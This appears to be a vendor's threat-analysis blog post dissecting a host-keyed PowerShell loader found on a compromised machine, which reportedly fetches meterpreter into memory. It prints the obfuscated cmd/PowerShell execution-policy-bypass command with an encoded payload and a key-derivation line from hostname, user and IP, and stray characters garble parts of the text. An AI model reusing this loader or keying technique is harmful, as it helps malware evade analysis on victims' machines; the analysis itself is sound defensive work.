ĢTV

This is some text inside of a div block.
Glitch effect

ThreatOps Analysis: Keyed Malware

Contributors:
Special thanks to our Contributors:
Glitch effectGlitch effectGlitch effect
Glitch banner

Malware authors are always coming up with clever ways to avoid detection. For malware written with managed code—for example, PowerShell or .NET malware—the authors will encode it to make it even harder to identify its malicious intent.

But if we were to take that a step further, attackers will sometimes “key” the malware for a particular host or user. This means the malware can only be run on the targeted host because it is tied based on hostname, IP address, or even the logged-in user.

Let's dig into an example.

In this blog, we’re looking at a PowerShell command with an environmentally keyed payload. In other words, the payload will (normally) only execute on the particular host for which it was keyed, making automated analysis much more difficult.

The Find

We identified a host with multiple malicious footholds. One such foothold was a :

"display_name": "CxPeyAYSmEobMGPQ","name": "LjyLgJoB","command": "%COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C \"iex ('''789cbd588f73d3c8154ec811c092'''+([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('fCV7JGRzemF5PSRffQpbQnl0ZVtdXSRrcW1vZj1AKCk7KDAuLigkZHN6YXkuTGVuZ3RoLzItMSkpfCV7JGtxbW9mKz1bY2hhcl1')))); exit\"\n",

The command uses the  environment variable, which by default points to cmd.exe. The command first starts an instance of cmd.exe, which starts another cmd.exe, which ultimately starts PowerShell.exe running a command specified by the -C option (the shortened DZپDz).

The PowerShell command itself consists of a long hexadecimal string concatenated with a call to  and a base64 string as the argument. Decoding the base64 string reveals what appears to be a decoder that the hexadecimal string (789cbd588f73…) is Գٴ:

ճ'Bad key' on the last line of the decoder stands out; there seems to be a case where the decoder can fail. Looking closer, we can see the COMPUTERNAME, USERNAME, DOMAINNAME, and IP address (lines 11–13) are combined to create a key — $kl— which is required to decode the payload (the hexadecimal string from the command):

$kl=($env:COMPUTERNAME,$env:USERNAME,$env:USERDOMAIN)@((Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'ipenabled=''true''').IPAddress)|%{$kl+=$_}

Malware authors and attackers like to use PowerShell because it is ubiquitous. In addition, the nature of PowerShell code makes it harder to identify as malicious, especially if the command is encoded. To inspect it, you either have to decode it or observe it while running. In this case, the payload was keyed to the host, so you can’t just run it anywhere.

We were able to hard code the key using the details we knew about the host (line 2) and print the decoded payload (line 17) rather than executing it:

ճ used to download and execute  directly from memory.

Interestingly, the payload includes several error messages that you would not expect to find in malware. For example, “something blocking access to the ‘Connect’ method, probably Firewall or AV software.” With the use of meterpreter and the expressive error messages, we initially thought this was from a penetration test, but the customer said they had not engaged a pen-testing company. 🤨

• • •

We hope you enjoyed this glimpse into the types of shady tactics that cross our threat analysts' desks. If anything, it shows the lengths attackers will go to maximize their payload and minimize their chance of being detected.

Want to dive into more threat analysis? Read some of our other blogs:

Categories
Share

Sign Up for Blog Updates

Subscribe today and you’ll be the first to know when new content hits the blog.

By submitting this form, you accept our Privacy Policy
Oops! Something went wrong while submitting the form.
ĢTV at work
Threat Analysis
Threat Analysis